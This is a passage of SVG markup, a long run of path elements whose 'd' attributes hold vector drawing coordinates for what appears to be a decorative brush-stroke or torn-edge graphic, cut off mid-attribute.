d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,